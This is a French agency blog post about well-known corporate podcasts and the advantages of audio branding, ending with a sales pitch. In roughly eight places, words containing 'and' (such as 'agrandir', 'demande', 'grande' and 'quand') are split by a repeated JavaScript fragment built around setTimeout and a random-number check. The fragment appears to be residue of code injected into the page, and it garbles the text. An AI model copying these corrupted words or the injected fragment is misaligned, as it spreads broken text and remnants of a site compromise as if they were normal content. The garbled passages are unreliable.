Les podcasts d’entreprises connus

Alors que le visuel se taille la part du lion à la télévision et les réseaux sociaux, un support média un peu délaissé revient au-devant de la scène. Il s’agit du podcast. Tirant son nom de la combinaison Ipod et broadcasting, ce support audio né dans les années 2000 est aujourd’hui en constante évolution, même si ses débuts n’ont pas été fulgurants. Cela lui a valu l’image de la tortue. Il permet néanmoins aux marques de produire davantage de contenu publicitaire pour agrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andir son cercle de prospects.

Quels sont les podcast d’entreprise les plus connus ?

Voici un échantillon des podcasts d’entreprises très connus. Vous remarquerez que l’on trouve différents secteurs d’activités :
● « Mouiller la chemise » de Maison Figaret (Prêt à porter)
● « Trained » de Nike (chaussures et vêtements de sport)
● « Question de peau » d’Eucerin (Bien-être)
● « Chalalove » de Gemmyo (joaillerie)
● « Regards » de Birchbox (cosmétiques)
● « Libres » de Tinder (site de rencontres)
● « Olfaplay » de Guerlain (parfumerie)
● « Faubourg des rêves » d’Hermès (maroquinerie de luxe)
● « I’m obsessed with this » de Netflix (bouquet de séries à la demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande)
● « Lipstories » de Sephora (cosmétique)
● « Conseils d’experts » de Lapeyre (aménagement de la maison)
● « Super Daily » de Supernatifs (Stratégie social média)
● « La trottinette sans tabous » de Dott (fabricant de trottinettes)
● « Hello Monday » de Linkedin (réseau social professionnel)
● « 50 ans d’histoire » des Mousquetaires (grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande distribution )
● « Feu » de Ducros (épices)

podcasts d'entreprise

Quels sont leurs avantages ?

  • Le podcast offre de la mobilité car c’est une communication nomade. Il peut faire partie de la PLV quandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and le client fait ses courses. Il peut être aussi écouté tranquillement avec des oreillettes sur un smartphone ou un Ipad. Le support audio envahit davantage d’espace que le support vidéo.
  • Le podcast permet d’aller droit au but et de proposer de la variété. Son temps est mesuré et sa construction par épisodes permet de mener l’auditeur là où l’on veut sans le perdre dans un argumentaire publicitaire. On insiste plus sur l’image de marque comme le storytelling.
  • Pour les entreprises, il permet de tempérer leur budget média car il est moins coûteux qu’une vidéo. Il peut être improvisé et demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande moins de moyens. Par exemple, pas besoin d’acteurs, le ou les narrateurs peuvent être des personnes lambda ou du personnel de l’entreprise. Il n’y a pas non plus de facteur temps car le podcast ne nécessite pas de programmation : il peut être l’objet d’une improvisation car il y a juste besoin d’un dictaphone. Le podcast a une dimension plus réelle que le visuel scénarisé.
  • L’Identité sonore apportée par ce support permet de créer une émotion. On peut ajouter une musique ou faire parler des personnes auquel l’auditeur s’identifie comme pour « Chalalove ».
  • Le podcast permet de mémoriser un élément audio, qui revient à identifier la marque.
identité sonore
  • La création d’identité sonore est aussi une manière de parler de la marque sans citer son nom. Il s’agit d’une publicité non agressive où l’on ne martèle pas le nom de la marque. Par contre, on l’intègre dans la vie quotidienne, un peu comme un feuilleton avec plusieurs épisodes. Cela permet de fidéliser un auditoire.
  • L’Identité sonore permet de répondre à un besoin secondaire au produit. Il a un rôle pédagogique, de conseil. L’auditeur va apprendre comment utiliser le produit. Différentes marques surfent sur la vague des tutos et du DIY : elles viennent par le podcast, compléter les supports déjà présents avec du contenu enrichi.
  • La création d’identité sonore apporte un nouveau visage aux marques déjà existantes depuis des décennies. C’est notamment des maisons de luxe comme Hermès. Elle donne un coup de jeune à moindre coût aux grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes maisons de luxe et permet des prospects des nouvelles décennies.
  • Le podcast permet de jouer un enjeu historique. En effet, l’auditeur peut suivre la naissance d’une entreprise et son cheminement étape par étape. A l’inverse, une marque avec quelques décennies d’histoire, peut revenir sur ses grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes évolutions. On peut ainsi donner l’impression que l’auditeur accompagne l’entreprise.
  • Le podcast peut générer de l’engagement : on peut y glisser un call to action et inviter le client à bénéficier par exemple d’un bon de réduction pour l’achat d’un produit. On peut aussi le convier à se rendre sur le site de la marque. Encore plus simplement, l’Identité sonore du podcast peut changer les habitudes du consommateur en l’incitant à faire quelque chose de bénéfique pour lui comme du sport.
  • La création d’une identité sonore pour le podcast peut aussi stimuler les autres sens de l’auditeur comme l’odorat ou le goût. Ainsi, un podcast invite ce dernier à sentir les notes d’un parfum ou goûter une épice. Il fait travailler davantage l’imaginaire du prospect ou du client d’une marque pour susciter une envie.

Le podcast tire donc son épingle du jeu parmi la multitude des médias mis à la disposition des entreprises, start-up ou marques de référence. Ses nombreux avantages font qu’il apporte un vent de fraîcheur sur la manière de communiquer. Pour mettre en place un podcast qui vous ressemble, contactez notre agence. Elle vous accompagnera pas à pas dans sa création.